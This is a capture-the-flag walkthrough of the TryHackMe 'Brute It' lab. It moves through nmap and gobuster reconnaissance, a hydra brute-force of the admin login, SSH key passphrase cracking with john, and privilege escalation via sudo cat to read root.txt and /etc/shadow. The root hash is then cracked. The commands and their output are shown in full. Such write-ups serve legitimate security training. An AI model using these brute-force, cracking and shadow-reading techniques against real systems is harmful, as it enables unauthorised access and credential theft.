Brute It
About The Room
Learn how to brute, hash cracking and escalate privileges in this box!
- Url: https://tryhackme.com/room/bruteit
- Creator: ReddyyZ
Reconnaissance
Nmap scan
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
nmap -sC -sV -T4 10.10.244.141
Starting Nmap 7.91 ( https://nmap.org ) at 2020-11-06 14:38 EST
Nmap scan report for 10.10.244.141
Host is up (0.17s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 4b:0e:bf:14:fa:54:b3:5c:44:15:ed:b2:5d:a0:ac:8f (RSA)
| 256 d0:3a:81:55:13:5e:87:0c:e8:52:1e:cf:44:e0:3a:54 (ECDSA)
|_ 256 da:ce:79:e0:45:eb:17:25:ef:62:ac:98:f0:cf:bb:04 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.01 seconds
We have identified two ports
- 22 ssh
- 80 http
Gobuster
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.244.141
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.244.141
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2020/11/06 14:35:49 Starting gobuster in directory enumeration mode
===============================================================
/admin (Status: 301) [Size: 314] [--> http://10.10.244.141/admin/]
HTTP
http://10.10.244.141/admin/ is a admin panel
Looking for username? Did you checked the source code!
1
<!-- Hey john, if you do not remember, the username is admin -->
Bingo! username is admin
Hydra
Brute-forcing admin panel form using hydra with username admin
1
hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.244.141 http-post-form "/admin/index.php:user=^USER^&pass=^PASS^:Username or password invalid" -f
Now you have the password for the admin panel! let’s see what’s inside? There is also a web flag like THM{xxxxxxxxxxxxxxxxxx}
RSA private key
Save the rsa file to your local system
John
With John, we can crack not only simple password hashes but also SSH Keys /usr/share/john/ssh2john.py id_rsa > id_rsa.hashes
Let’s use john and rockyou.txt to try and crack the SSH Key.
1
2
3
4
5
6
7
8
9
10
11
12
13
john id_rsa.hash -wordlist=rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 4 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
XXXXXXXXXX (id_rsa)
Warning: Only 2 candidates left, minimum 4 needed for performance.
1g 0:00:00:07 DONE (2020-11-06 14:56) 0.1338g/s 1919Kp/s 1919Kc/s 1919KC/sa6_123..*7¡Vamos!
Session completed
Gaining Shell
SSH and User flag
before using ssh to connect don’t forget to change permission of rsa key chmod 400 id_rsa
Now we are ready to pwn the box ssh john@10.10.244.141 -i "id_rsa"
User flag
1
2
john@bruteit:~$ cat user.txt
THM{XXXXXXXXXXXXXXXXXXXXXX}
Privilege escalation
Root flag
1
2
3
4
5
6
7
john@bruteit:~$ sudo -l
Matching Defaults entries for john on bruteit:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User john may run the following commands on bruteit:
(root) NOPASSWD: /bin/cat
If the binary is allowed to run as superuser by sudo
, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access.
1
2
LFILE=file_to_read
sudo cat "$LFILE"
1
2
3
john@bruteit:~$ LFILE=/root/root.txt
john@bruteit:~$ sudo cat "$LFILE"
THM{XXXXXXXXXXXX}
We are asked to find root’s password?
Read shadow file and crack the password of Root
1
2
3
4
5
6
7
8
9
10
11
john@bruteit:~$ LFILE=/etc/shadow
john@bruteit:~$ sudo cat "$LFILE"
root:$6$zdk0.jUm$Vya24cGzM1duJkwM5b17Q205xDJ47LOAg/OpZvJ1gKbLF8PJBdKJA4a6M.JYPUTAaWu4infDjI88U9yUXEVgL.:18490:0:99999:7:::
daemon:*:18295:0:99999:7:::
bin:*:18295:0:99999:7:::
sys:*:18295:0:99999:7:::
sync:*:18295:0:99999:7:::
games:*:18295:0:99999:7:::
man:*:18295:0:99999:7:::
lp:*:18295:0:99999:7:::
...
John to crack admin password
1
echo "root:$6$zdk0.jUm$Vya24cGzM1duJkwM5b17Q205xDJ47LOAg/OpZvJ1gKbLF8PJBdKJA4a6M.JYPUTAaWu4infDjI88U9yUXEVgL.:18490:0:99999:7:::" >root.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
john root.txt
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 4 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Warning: Only 14 candidates buffered for the current salt, minimum 16 needed for performance.
Warning: Only 10 candidates buffered for the current salt, minimum 16 needed for performance.
Warning: Only 15 candidates buffered for the current salt, minimum 16 needed for performance.
Almost done: Processing the remaining buffered candidate passwords, if any.
Warning: Only 8 candidates buffered for the current salt, minimum 16 needed for performance.
Proceeding with wordlist:/usr/share/john/password.lst, rules:Wordlist
xxxxxxx (root)
1g 0:00:00:02 DONE 2/3 (2020-11-06 15:24) 0.4587g/s 1588p/s 1588c/s 1588C/s 123456..crawford
Use the "--show" option to display all of the cracked passwords reliably
Session completed
Thanks for reading this. Good Luck.